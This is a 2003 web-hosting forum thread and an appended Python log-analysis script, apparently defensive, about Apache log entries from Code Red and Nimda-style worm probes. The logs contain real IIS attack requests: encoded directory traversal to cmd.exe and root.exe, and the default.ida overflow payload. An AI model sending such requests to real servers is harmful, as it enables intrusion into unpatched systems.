The Community Forums

Interact with an entire community of cPanel & WHM users!

How to stop this process?

Discussion in 'General Discussion' started by tekdns, Jun 15, 2003.

  1. tekdns

    Hi,


    How do I stop/block the processes below?

    "12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
    12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
    12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:51 -0400] "GET /scripts/shell.exe?/c+dir+c: HTTP/1.1" 404 -
    127.0.0.1 - - [15/Jun/2003:04:35:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17184
    127.0.0.1 - - [15/Jun/2003:04:37:30 -0400] "GET / HTTP/1.0" 200 2673
    66.168.234.28 - - [15/Jun/2003:04:39:34 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    127.0.0.1 - - [15/Jun/2003:04:40:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17559
    218.70.224.215 - - [15/Jun/2003:04:40:22 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    217.219.246.4 - - [15/Jun/2003:04:44:22 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    66.190.164.146 - - [15/Jun/2003:04:44:56 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:44:57 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:44:58 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:44:59 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:00 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:01 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    127.0.0.1 - - [15/Jun/2003:04:45:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17966
    66.190.164.146 - - [15/Jun/2003:04:45:01 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:02 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:03 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:04 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
    66.190.164.146 - - [15/Jun/2003:04:45:05 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:06 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:06 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
    66.190.164.146 - - [15/Jun/2003:04:45:07 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
    66.190.164.146 - - [15/Jun/2003:04:45:08 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:09 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    127.0.0.1 - - [15/Jun/2003:04:45:50 -0400] "GET / HTTP/1.0" 200 2673
    127.0.0.1 - - [15/Jun/2003:04:50:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18253
    66.82.121.147 - - [15/Jun/2003:04:51:49 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    127.0.0.1 - - [15/Jun/2003:04:54:11 -0400] "GET / HTTP/1.0" 200 2673
    127.0.0.1 - - [15/Jun/2003:04:55:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18059
    66.227.42.208 - - [15/Jun/2003:04:57:40 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    66.31.55.164 - - [15/Jun/2003:04:57:40 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:41 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:43 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:44 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:44 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
    66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
    66.31.55.164 - - [15/Jun/2003:04:57:46 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
    66.31.55.164 - - [15/Jun/2003:04:57:46 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:47 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.126.168.169 - - [15/Jun/2003:04:57:48 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    24.130.75.129 - - [15/Jun/2003:04:58:28 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    127.0.0.1 - - [15/Jun/2003:05:00:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18040
    127.0.0.1 - - [15/Jun/2003:05:02:31 -0400] "GET / HTTP/1.0" 200 2673
    127.0.0.1 - - [15/Jun/2003:05:05:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18264
    12.224.137.0 - - [15/Jun/2003:05:08:53 -0400] "GET /..%255c..%280
    12.224.137.0 - - [15/Jun/2003:05:08:59 -0400] "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
    12.224.137.0 - - [15/Jun/2003:05:08:59 -0400] "GET /msadc/

    ....................."

    Because after these processes, my server went down.

    Thanks for your help

  2. promak

    This is Code Red.
    Try searching for Code Red in this forum.

  3. tAzMaNiAc

    Those processes have nothing to do with why your server went down. Those are Windows machines looking to attack Windows machines with the IIS vulnerabilities.

    Unless you are running IIS and some strange configuration (cPanel DOES NOT run IIS :-D), this is not the problem.

    Brenden

  4. Website Rob

    It is possible that too many connection attempts were coming in too fast, creating a 'mini' DDOS attack. A brief look showed double-digit attempts per second.

    Do a search on this forum for 'sumthin' as there is some good information in one of the posts about what to do in these types of situations.

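One way to check both points raised in the replies against an access log, as an added example that is not part of the original thread: it counts requests for IIS-only paths per source, records any such request answered with 200, and reports each source's peak requests per second. The sample lines are constructed (documentation IP ranges), and `summarize`, `LINE` and `IIS_PROBE` are illustrative names.

```python
import re
from collections import Counter

# Constructed sample in Apache common log format, shaped like the entries
# quoted in the thread; the last line is deliberately truncated.
SAMPLE = """\
192.0.2.10 - - [15/Jun/2003:04:44:56 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 265
192.0.2.10 - - [15/Jun/2003:04:44:56 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
192.0.2.10 - - [15/Jun/2003:04:44:57 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
198.51.100.7 - - [15/Jun/2003:04:44:57 -0400] "GET /default.ida?XXXXXXXX=a HTTP/1.0" 302 621
127.0.0.1 - - [15/Jun/2003:04:45:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17966
203.0.113.5 - - [15/Jun/2003:04:45:02 -0400] "GET /index.html HTTP/1.0" 200 2673
192.0.2.10 - - [15/Jun/2003:05:08:59 -0400] "GET /msadc/
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+$')
# Paths that only exist on Windows/IIS hosts; on an Apache server a request
# for them is a blind probe that the server has nothing to execute for.
IIS_PROBE = re.compile(r'(?i)(/default\.ida\b|/cmd\.exe\b|/root\.exe\b)')

def summarize(log_text):
    probes = Counter()      # source IP -> number of IIS-targeted requests
    per_second = Counter()  # (ip, timestamp) -> requests logged in that second
    served = []             # probes answered with 200, which deserve a closer look
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # skip truncated or malformed lines
        ip, ts, _method, path, status = m.groups()
        per_second[(ip, ts)] += 1
        if IIS_PROBE.search(path):
            probes[ip] += 1
            if status == "200":
                served.append((ip, path))
    peak = Counter()        # source IP -> highest request count in any one second
    for (ip, _ts), n in per_second.items():
        peak[ip] = max(peak[ip], n)
    return {"probes": dict(probes), "peak_rps": dict(peak), "served": served}

if __name__ == "__main__":
    report = summarize(SAMPLE)
    for ip, n in sorted(report["probes"].items()):
        print(f"{ip}: {n} IIS probe(s), peak {report['peak_rps'][ip]} req/s")
    print("probes answered with 200:", report["served"])
```

An empty `served` list means none of the probes was answered with content, while a high `peak_rps` for a source points to the request-rate concern instead.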
     